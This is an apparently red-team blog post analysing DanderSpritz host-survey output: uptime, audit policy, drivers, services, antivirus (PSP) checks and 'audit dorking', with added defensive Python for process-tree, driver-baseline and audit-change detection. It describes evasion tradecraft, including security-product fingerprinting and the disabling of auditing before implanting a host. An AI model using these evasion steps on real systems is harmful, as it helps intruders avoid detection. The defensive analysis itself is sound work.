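As an added example (not the post's code and not DanderSpritz's), the block below rebuilds the parent/child indentation from PID/PPID the way the table above renders it, and layers on the kind of sanity checks the "Check path in processdeep" comment hints at: a core Windows binary running outside System32, under an unexpected parent, or as an unexpected account. The rows are a subset of the listing above plus one constructed suspicious svchost.exe (PID 4444); the expected-parent table is the normal Windows 7 process lineage.

```python
# Rows are (pid, ppid, full_path, user). The first seven come from the listing above;
# PID 4444 is a constructed suspicious entry used to exercise the checks.
PROCESSES = [
    (4,    0,    r"System",                                     ""),
    (272,  4,    r"\SystemRoot\System32\smss.exe",              r"NT AUTHORITY\SYSTEM"),
    (416,  352,  r"C:\Windows\system32\wininit.exe",            r"NT AUTHORITY\SYSTEM"),
    (516,  416,  r"C:\Windows\system32\services.exe",           r"NT AUTHORITY\SYSTEM"),
    (640,  516,  r"C:\Windows\system32\svchost.exe",            r"NT AUTHORITY\SYSTEM"),
    (524,  416,  r"C:\Windows\system32\lsass.exe",              r"NT AUTHORITY\SYSTEM"),
    (2760, 2712, r"C:\Windows\Explorer.EXE",                    r"OP-PC\OP"),
    (4444, 2760, r"C:\Users\OP\AppData\Local\Temp\svchost.exe", r"OP-PC\OP"),  # constructed
]

SYSTEM32 = "c:\\windows\\system32\\"
# Core Windows binaries that must live in System32 and, where listed, have a fixed parent.
CORE_BINARIES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "services.exe",
                 "lsass.exe", "lsm.exe", "svchost.exe"}
EXPECTED_PARENT = {
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "lsm.exe": {"wininit.exe"},
    "svchost.exe": {"services.exe"},
}
SYSTEM_ONLY = {"smss.exe", "wininit.exe", "services.exe", "lsass.exe", "lsm.exe"}
SYSTEM_USER = "nt authority\\system"


def norm_path(path: str) -> str:
    p = path.replace("/", "\\").lower()
    if p.startswith("\\systemroot\\"):          # kernel-style path, as shown for smss.exe
        p = "c:\\windows\\" + p[len("\\systemroot\\"):]
    return p


def basename(path: str) -> str:
    return norm_path(path).rsplit("\\", 1)[-1]


def tree_depth(pid: int, by_pid: dict) -> int:
    """Number of ancestors present in the listing; an exited parent makes a new root."""
    depth, seen, ppid = 0, {pid}, by_pid[pid][1]
    while ppid in by_pid and ppid not in seen:
        depth += 1
        seen.add(ppid)
        ppid = by_pid[ppid][1]
    return depth


def render_tree(rows, marker: str = "---") -> list:
    """(pid, indented path) in the page's style: one marker per level below a present ancestor."""
    by_pid = {r[0]: r for r in rows}
    return [(pid, marker * tree_depth(pid, by_pid) + path) for pid, _, path, _ in rows]


def audit_processes(rows) -> dict:
    """Findings per PID: wrong directory, unexpected parent, or unexpected account."""
    by_pid = {r[0]: r for r in rows}
    findings = {}
    for pid, ppid, path, user in rows:
        name, issues = basename(path), []
        if name in CORE_BINARIES and not norm_path(path).startswith(SYSTEM32):
            issues.append(f"{name} running from {norm_path(path)!r}, expected System32")
        if name in EXPECTED_PARENT and ppid in by_pid:   # skip exited parents (ppid 352 above)
            parent = basename(by_pid[ppid][2])
            if parent not in EXPECTED_PARENT[name]:
                issues.append(f"{name} parent is {parent} (pid {ppid}), "
                              f"expected one of {sorted(EXPECTED_PARENT[name])}")
        if name in SYSTEM_ONLY and user.lower() != SYSTEM_USER:
            issues.append(f"{name} running as {user!r}, expected SYSTEM")
        if issues:
            findings[pid] = issues
    return findings


if __name__ == "__main__":
    for pid, line in render_tree(PROCESSES):
        print(f"{pid:>5} {line}")
    for pid, issues in audit_processes(PROCESSES).items():
        for issue in issues:
            print(f"[!] pid {pid}: {issue}")
```

wininit.exe and csrss.exe legitimately show an absent parent on Windows 7 (the smss.exe instance that spawned them exits), which is why the parent check only fires when the parent is still in the listing.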

System Uptime

Yet another classic piece of data; I can't say how many times I have checked uptime to learn a user's routine.

- [2017-11-09 19:28:31 z0.0.0.13] ===================================== Uptime =====================================================================
Uptime: 1 days, 8:32:13

System Auditing

This is something I feel we could do better on red teams: making sure we fully understand the audit posture of a host before we implant it. It is something I will be pushing my team to do more as we grow.

- [2017-11-09 19:28:31 z0.0.0.13] ================== Auditing status check, dorking will be later ==================================================
- [2017-11-09 19:28:32 z0.0.0.13] Data age: 00 seconds - data is fresh
- [2017-11-09 19:28:32 z0.0.0.13] Auditing is enabled on this machine
|             Category              | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange        | True    | False   |
| System_Integrity                  | True    | True    |
| System_Others                     | True    | True    |
| Logon_Logon                       | True    | False   |
| Logon_Logoff                      | True    | False   |
| Logon_AccountLockout              | True    | False   |
| Logon_SpecialLogon                | True    | False   |
| Logon_NPS                         | True    | True    |
| PolicyChange_AuditPolicy          | True    | False   |
| PolicyChange_AuthenticationPolicy | True    | False   |
| AccountManagement_UserAccount     | True    | False   |
| AccountManagement_SecurityGroup   | True    | False   |
- [2017-11-09 19:28:32 z0.0.0.13] The above is only being shown for informational purposes, you will be prompted about dorking later

System Drivers

I take system enumeration pretty seriously, and so do some of the best operators I have worked with. One thing I don't see enough of is the enumeration and monitoring of system drivers. They are a core component of most AV products, cannot easily be hidden, and must be signed on modern 64-bit Windows. An interesting poll I took seems to bear this out:

One thing of interest here is the exhaustive list of drivers they compiled, keyed on hashes and naming conventions, which even alerts on known malware: Driver List. There is also a list of drivers belonging to known Personal Security Products (PSPs).

These driver lists may help you implement similar checks yourself; expect some .CNA scripts for Cobalt Strike soon :)

- [2017-11-09 19:28:32 z0.0.0.13] =================================== Driver list ===================================================================
Running command 'python D:\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"'
- |      Driver       |            Path             |      Flags       |             Comment              |  Type   | First Seen | Also On |
- +-------------------+-----------------------------+------------------+----------------------------------+---------+------------+---------+
- | dump_diskdump.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH   | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-11-08 |         |
- | dump_dumpfve.sys  | C:\Windows\system32\drivers | RANDOM,NO_HASH   | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-11-08 |         |
- | dump_lsi_sas.sys  | C:\Windows\system32\drivers | RANDOM,NO_HASH   | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-11-08 |         |
- | vmmemctl.sys      | C:\Windows\system32\drivers | NAME_MATCH,NEW   | VMware Server Memory Controller  | NORMAL  | 2017-11-08 |         |
- | vmrawdsk.sys      | C:\Windows\system32\drivers | NAME_MATCH,NEW   | VMWare Raw Disk Helper Driver    | NORMAL  | 2017-11-08 |         |
- | vmusbmouse.sys    | C:\Windows\system32\drivers | NEW,UNIDENTIFIED |                                  |         | 2017-11-08 |         |
- | vsock.sys         | C:\Windows\system32\drivers | NEW,UNIDENTIFIED |                                  |         | 2017-11-08 |         |
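The flags in the table above (RANDOM, NO_HASH, NAME_MATCH, NEW, UNIDENTIFIED) and the First Seen / Also On columns describe a baseline-driven classifier. The block below is an added example of that approach, not the post's code and not driverlist.py from the leak: it checks each driver against a name catalogue, a hash catalogue and a small PSP list, tracks first-seen dates and other hosts, and treats dump_*.sys specially. The catalogue entries are the two VMware drivers from the table; the hashes, the PSP subset, the second host and the klif.sys/mfehidk.sys rows are constructed.

```python
import re
from dataclasses import dataclass, field

# Catalogue keyed by file name (entries from the table above) and by SHA-256
# (the hash here is a constructed placeholder, not a real value).
KNOWN_BY_NAME = {
    "vmmemctl.sys": "VMware Server Memory Controller",
    "vmrawdsk.sys": "VMWare Raw Disk Helper Driver",
}
KNOWN_BY_HASH = {
    "9f" * 32: ("vsock.sys", "VMware vSockets Driver"),   # constructed hash
}
# Illustrative subset of drivers belonging to Personal Security Products (PSPs).
PSP_DRIVERS = {"klif.sys": "Kaspersky", "mfehidk.sys": "McAfee"}
# Windows copies its boot storage stack into dump_<driver>.sys for the crash-dump path,
# so these names vary per machine and are not worth baselining.
DUMP_DRIVER = re.compile(r"^dump_.+\.sys$", re.IGNORECASE)


@dataclass
class Baseline:
    first_seen: dict = field(default_factory=dict)   # driver name -> date first seen anywhere
    hosts: dict = field(default_factory=dict)        # driver name -> set of hosts it was seen on

    def record(self, host: str, name: str, today: str) -> None:
        self.first_seen.setdefault(name, today)
        self.hosts.setdefault(name, set()).add(host)


def classify_driver(name: str, sha256: str, host: str, baseline: Baseline, today: str) -> dict:
    """One row in the style of the table above: flags, comment, type, first seen, also on."""
    key = name.lower()
    flags, comment, dtype, also_on = set(), "", "", []
    if DUMP_DRIVER.match(key):
        flags.add("RANDOM")
        comment, dtype = "!!! POSSIBLE driver mem dump !!!", "WARNING"
    else:
        if key not in baseline.first_seen:
            flags.add("NEW")
        also_on = sorted(baseline.hosts.get(key, set()) - {host})
        baseline.record(host, key, today)
    if not sha256:
        flags.add("NO_HASH")
    elif sha256.lower() in KNOWN_BY_HASH:
        known_name, desc = KNOWN_BY_HASH[sha256.lower()]
        flags.add("HASH_MATCH")
        if known_name != key:
            flags.add("RENAMED")              # known binary under an unexpected file name
        comment, dtype = comment or desc, dtype or "NORMAL"
    if key in KNOWN_BY_NAME:
        flags.add("NAME_MATCH")
        comment, dtype = comment or KNOWN_BY_NAME[key], dtype or "NORMAL"
    if key in PSP_DRIVERS:
        comment, dtype = comment or f"{PSP_DRIVERS[key]} security product", "PSP"
    if not dtype:
        flags.add("UNIDENTIFIED")
    return {"driver": name, "flags": flags, "comment": comment, "type": dtype,
            "first_seen": baseline.first_seen.get(key, today), "also_on": also_on}


# (name, sha256 or "", host): rows from the table above with constructed hashes,
# then constructed rows for a second host that shares vsock.sys.
SAMPLE_DRIVERS = [
    ("dump_diskdump.sys", "",        "OP-PC"),
    ("vmmemctl.sys",      "aa" * 32, "OP-PC"),
    ("vmusbmouse.sys",    "bb" * 32, "OP-PC"),
    ("vsock.sys",         "9f" * 32, "OP-PC"),
    ("vsock.sys",         "9f" * 32, "FILESRV01"),   # constructed
    ("klif.sys",          "",        "FILESRV01"),   # constructed
]


def run(records, baseline: Baseline = None, today: str = "2017-11-08") -> list:
    baseline = baseline or Baseline()
    return [classify_driver(n, h, host, baseline, today) for n, h, host in records]


if __name__ == "__main__":
    for row in run(SAMPLE_DRIVERS):
        print(f"{row['driver']:<18} {','.join(sorted(row['flags'])):<24} "
              f"{row['type']:<8} {row['comment']:<34} also on: {row['also_on']}")
```

Keeping the baseline per project rather than per host is what makes the Also On column useful: a driver that is NEW on one box but already known on three others is far less interesting than one that is NEW, UNIDENTIFIED and seen nowhere else.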

System Installed Packages / System Software Keys

While not super interesting, this is standard situational awareness that the agent performs on initial access.

- [2017-11-09 19:28:43 z0.0.0.13] =============================== Installed software ===============================================================

- --------------------------------------------------------------- Installer Packages ---------------------------------------------------------------
- [2017-11-09 19:28:45 z0.0.0.13] Data age: 01 seconds - data is fresh
| Architecture |                              Name                              |      Description      | Installed version | Date installed |
+--------------+----------------------------------------------------------------+-----------------------+-------------------+----------------+
| 32-bit       | Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 | Microsoft Corporation | 9.0.30729.6161    | 2017-11-09     |
| 32-bit       | VMware Tools                                                   | VMware, Inc.          | 10.1.15.6627299   | 2017-11-09     |
- ----------------------------------------------------------------- Software key(s) -----------------------------------------------------------------
- [2017-11-09 19:28:47 z0.0.0.13] Data age: 01 seconds - data is fresh
| Architecture |          Name          | Last update |
+--------------+------------------------+-------------+
| 32-bit       | ATI Technologies       | 2009-07-14  |
| 32-bit       | Classes                | 2017-11-10  |

- -------------------------------------------------------------- Program files dir(s) --------------------------------------------------------------
- [2017-11-09 19:28:50 z0.0.0.13] Data age: 01 seconds - data is fresh
| Architecture |       Folder Name        |           Modified            |
+--------------+--------------------------+-------------------------------+
| 32-bit       | Common Files             | 2017-11-10T05:35:26.343307800 |
| 32-bit       | DVD Maker                | 2009-07-14T07:20:43.834375000 |
| 32-bit       | Internet Explorer        | 2009-07-14T04:56:49.415378700 |
| 32-bit       | MSBuild                  | 2009-07-14T04:52:30.938524700 |
<----SNIP----->

Service Checks

Service enumeration can be a bit messy with the built-in command-line tools. I like this module's clean output, with the full display name alongside each service name. Not much else of interest here.

- [2017-11-09 19:28:50 z0.0.0.13] ================================ Running services ================================================================
- [2017-11-09 19:28:52 z0.0.0.13] Data age: 01 seconds - data is fresh
|                 Display name                 |            Service name             |
+----------------------------------------------+-------------------------------------+
| Application Information                      | Appinfo                             |
| Windows Audio Endpoint Builder               | AudioEndpointBuilder                |
| Windows Audio                                | Audiosrv                            |
| Base Filtering Engine                        | BFE                                 |
| Background Intelligent Transfer Service      | BITS                                |
<----SNIP----->
PSP Checks

So I have heard this time and time again:

I don't care about AV

Which, for the longest time, may have been right. But now imagine your mission is to use a million-dollar toolset and operate on targets of national interest (if that is what this tool was used for). If you leave behind a trace on past targets, that is the type of thing that has massive political effects as well as capability loss. From the intelligence I have seen and researched, many APT groups focus on collection operations. While access may be leveraged for physical effects (rarely the case, but it did happen during the Russo-Georgian War), it is rare that we know this type of action took place or even occurs. As you can imagine, no country wants to expose that its critical infrastructure may have been compromised. Now combine that with intel gathered by sizeable cyber intelligence firms such as Kaspersky, Symantec, etc.: if they can trace back past samples that were analyzed by their engines, you may place the toolkit and the access at risk. A great example would be Stuxnet and their ability to track down versioning of the agent with automatic cloud submission and telemetry data.

We will be covering this module in depth in Post 4 as well:

- [2017-11-09 19:28:52 z0.0.0.13] =================================== AV Check!!! ===================================================================
Running command 'python windows\checkpsp.py -project Ops '
- Checking for any running known PSP's...
-   microsoft
- 

- Checking for target PSP history...

- Found configuration history for Microsoft.

- Saw PSP's we can act on. Running scripts.
- ============================================
- =                microsoft                 =
- ============================================
- Checking for a change in configuration

- The following PSPs had NO changes:
-   Microsoft Windows Defender Windows 7 Enterprise
- +--------------------+----------------------+
- |                    |    Setting Value     |
- +--------------------+----------------------+
- | vendor             |            Microsoft |
- | product            |     Windows Defender |
- | version            | Windows 7 Enterprise |
- | Definition Updates |                 None |
- | Information        |                 None |
- | Install Date       |                 None |
- | Log File           |                 None |
- | Quarantine         |                 None |
- | ServiceStart       |                    2 |
- | Software           |                  PSP |
- | SpyNet             |                    0 |
- | Status             |              Enabled |
- +--------------------+----------------------+
Audit Dorking

Another topic I plan on deep diving into and pulling out data on is the ability to dork auditing, potentially reducing the visibility that automated log collection assets have into the host. An interesting module indeed.

- [2017-11-09 19:29:00 z0.0.0.13] ================================ Auditing dorking ================================================================
- [2017-11-09 19:29:00 z0.0.0.13] Data age: 28 seconds (from local cache, re-run manually if you need to)
- [2017-11-09 19:29:00 z0.0.0.13] Auditing is enabled on this machine
|             Category              | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange        | True    | False   |
| System_Integrity                  | True    | True    |
| System_Others                     | True    | True    |
| Logon_Logon                       | True    | False   |
| Logon_Logoff                      | True    | False   |
| Logon_AccountLockout              | True    | False   |
| Logon_SpecialLogon                | True    | False   |
| Logon_NPS                         | True    | True    |
| PolicyChange_AuditPolicy          | True    | False   |
| PolicyChange_AuthenticationPolicy | True    | False   |
| AccountManagement_UserAccount     | True    | False   |
| AccountManagement_SecurityGroup   | True    | False   |
Do you want to dork security auditing?
YES
- [2017-11-09 19:29:05 z0.0.0.13] Security auditing work, do not stop command 291 or you will lose your blessing
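The audit table above is exactly the kind of snapshot a defender should keep and compare over time: a category that flips from True to False is the visible symptom of auditing being dorked. The following is an added example in Python (not code from the post or from DanderSpritz) that parses two constructed snapshots in the same table format and reports which categories were weakened.

```python
import re

# Constructed sample snapshots in the layout of the DS "Auditing dorking" table.
# BASELINE is the state from before the intrusion window; LATER is a snapshot
# in which System_Integrity and Logon_Logon auditing have been switched off.
BASELINE = """\
|             Category              | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange        | True    | False   |
| System_Integrity                  | True    | True    |
| Logon_Logon                       | True    | False   |
| PolicyChange_AuditPolicy          | True    | False   |
"""

LATER = """\
|             Category              | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange        | True    | False   |
| System_Integrity                  | False   | False   |
| Logon_Logon                       | False   | False   |
| PolicyChange_AuditPolicy          | True    | False   |
"""

# One data row: "| <Category> | True/False | True/False |" (header and rule lines don't match)
ROW = re.compile(r"^\|\s*(\S+)\s*\|\s*(True|False)\s*\|\s*(True|False)\s*\|$")

def parse_audit_table(text):
    """Return {category: (success_audited, failure_audited)} from a DS-style table."""
    policy = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            policy[m.group(1)] = (m.group(2) == "True", m.group(3) == "True")
    return policy

def weakened_categories(baseline, current):
    """List (category, 'Success'|'Failure') pairs that were audited before and are not now.
    A category missing from the current snapshot is treated as fully disabled."""
    findings = []
    for cat, (succ, fail) in baseline.items():
        cur_succ, cur_fail = current.get(cat, (False, False))
        if succ and not cur_succ:
            findings.append((cat, "Success"))
        if fail and not cur_fail:
            findings.append((cat, "Failure"))
    return findings

if __name__ == "__main__":
    for cat, kind in weakened_categories(parse_audit_table(BASELINE), parse_audit_table(LATER)):
        print(f"ALERT: {kind} auditing disabled for {cat}")
```

In production the same comparison is better driven from Security event 4719 (system audit policy was changed) or scheduled auditpol exports than from ad hoc snapshots.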
System Monitors

It's funny because I spoke on this type of thing in depth, using Event Tracing and WMI to log user and potentially defensive actions taking place on a host. Slides to that talk can be found here. Interestingly enough, we will see in the next post that they used the front end to update this info continuously. Red Teams should be implementing these types of CI, allowing an operator to take the necessary steps in a contingency event. This type of monitoring is often used heavily with C2 infrastructure, as it's often the first sign your campaign may have been burnt.

- [2017-11-09 19:29:05 z0.0.0.13] Security auditing dorked, do not stop command 291 or you will lose your blessing

- [2017-11-09 19:29:05 z0.0.0.13] ==================================== Monitors ====================================================================
     Monitors
     -----------------------------
 1)  Full - arp, netstat, activity
 2)  Netstat and activity
 3)  Activity only

 4)  Done

Select your monitors (full recommended for most situations): [1] 
Staring a monitor with activity -monitor 

Final Thoughts

We have really only touched on the capability of this agent! I'm sorry it's taking a bit to get this analysis out, as post four will be pretty intense and contains a good bit of research.

NOTE: Not A IPA*

Alexander Rymdeko-Harvey

Alexander Rymdeko-Harvey is an experienced Red Teamer. He loves to develop on offensive TTPs and has a knack for Windows internals. He prides himself on being a husband, father and prior Army.